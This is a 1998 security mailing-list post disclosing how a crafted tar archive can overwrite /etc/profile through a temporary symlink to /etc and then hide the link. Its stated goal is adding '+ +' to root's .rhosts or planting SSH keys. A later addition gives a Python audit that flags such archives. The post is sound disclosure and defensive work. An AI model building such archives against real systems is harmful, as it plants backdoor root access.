tar "features"

From: Willy TARREAU (tarreauat_private)
Date: Tue Sep 22 1998 - 00:56:46 PDT

    Hi all !
    
    After reading all these threads about locate, bash ..., I wondered how tar
    could be abused. Although I didn't find a buffer overflow in a file or
    directory name (fortunately), a way came to me to make tar overwrite
    absolute files on disk (given the user has access to them), but I can't find
    how to protect from this because it's based on a perfectly legal behaviour.
    It's based on the symlinks.
    
    Here's an example of a tar file which will overwrite your /etc/profile to
    make it add "+ +" to root's .rhosts next time he logs in. So if part of its
    directory architecture is included in any package, a root user could un-tar
    it to any location without really noticing that /etc/profile has been
    rewritten.
    
    Of course it would be simpler with only two files, one link to /root and a
    .rhosts, but that becomes really evident when you consult the file before
    extracting it. Note that it could also be interesting to write a key to
    $ANYUSER/.ssh/authorized_keys !
    
    The output of tar ztvf gives this:
    $ tar ztvf trojanhorse.tar.gz
    drwxr-xr-x willy/users       0 Sep 21 11:43 1998 Src/
    -rw-r--r-- willy/users      46 Sep 21 11:43 1998 Src/Makefile
    -rw-r--r-- willy/users      17 Sep 21 11:42 1998 Src/dummy.c
    lrwxrwxrwx willy/users       0 Sep 21 11:45 1998 src -> Src
    drwxr-xr-x willy/users       0 Sep 21 11:41 1998 Include/
    -rw-r--r-- willy/users      30 Sep 21 11:41 1998 Include/config.h
    lrwxrwxrwx willy/users       0 Sep 21 11:34 1998 include -> /etc
    -rw-r--r-- willy/users     758 Sep 21 11:40 1998 include/profile
    lrwxrwxrwx willy/users       0 Sep 21 11:53 1998 include -> Include
    
    The "src" and "Src" directories are just here to make detection less evident.
    It is the "include" link to /etc which does the work. After processing,
    it's re-linked to "Include" so when tar ends, no trace is kept of what has
    been done, except in /etc/profile.
    
    The file comes here, uuencoded. PLEASE SAVE YOUR /etc/profile before
    extracting it to any place (/tmp, for example). I think that if tar gave
    just a warning each time a file is written after a symlink, and each time
    a symlink points to /something, this could be good, but perhaps someone
    would have a better idea.
    
                                            Willy
    
    --
    +----------------------------------------------------------------------------+
    | Willy Tarreau - tarreauat_private - http://www-miaif.lip6.fr/willy/  |
    | System and Network Engineer at NOVECOM ( France ) - http://www.novecom.fr/ |
    | Magistere d'Informatique Appliquee de l'Ile de France ( MIAIF ), Year 1997 |
    +----------------------------------------------------------------------------+
    
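The pre-extraction check Willy asks for at the end of his post, as an added example that is not part of the original message: it builds, in memory, a constructed archive with the same shape as the listing above (a stand-in payload instead of the real /etc/profile), then walks the member list in archive order, flagging every symlink whose target is absolute or escapes the extraction root and every member that would be written through an earlier symlink entry. The function names, the sample file contents and the use of Python's standard tarfile module are assumptions of this example.

```python
import io
import posixpath
import tarfile

def build_sample_archive() -> bytes:
    """Construct in memory an archive shaped like the one in the post (sample, not the original)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        def add(name, data=b"", target=None):
            ti = tarfile.TarInfo(name)
            if target is not None:          # symlink member
                ti.type, ti.linkname = tarfile.SYMTYPE, target
                tf.addfile(ti)
            else:                           # regular file member
                ti.size = len(data)
                tf.addfile(ti, io.BytesIO(data))
        add("Src/Makefile", b"all: dummy\n")
        add("src", target="Src")
        add("Include/config.h", b"#define X 1\n")
        add("include", target="/etc")                    # the link that does the work
        add("include/profile", b"# payload stand-in\n")  # lands in /etc/profile if the link is followed
        add("include", target="Include")                 # re-pointed so no trace remains afterwards
    return buf.getvalue()

def audit_tar(data: bytes) -> list:
    """Report symlinks that escape the extraction root and members written through a symlink."""
    findings, links = [], {}   # links: normalised member path -> most recent symlink target
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as tf:
        for ti in tf:
            name = posixpath.normpath(ti.name)
            if ti.issym():
                resolved = posixpath.normpath(posixpath.join(posixpath.dirname(name), ti.linkname))
                if ti.linkname.startswith("/") or resolved == ".." or resolved.startswith("../"):
                    findings.append(f"symlink {name} -> {ti.linkname} escapes extraction root")
                links[name] = ti.linkname   # a later symlink with the same name replaces the target
                continue
            parts = name.split("/")         # check every ancestor directory against known symlinks
            for i in range(1, len(parts)):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append(f"{name} is written through symlink {prefix} -> {links[prefix]}")
                    break
    return findings

if __name__ == "__main__":
    for line in audit_tar(build_sample_archive()):
        print(line)
```

Because the scan works on the member list alone, it can be run on an untrusted archive before anything touches the disk; the "src -> Src" and "include -> Include" links pass, and only the /etc link and the file routed through it are reported.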
    


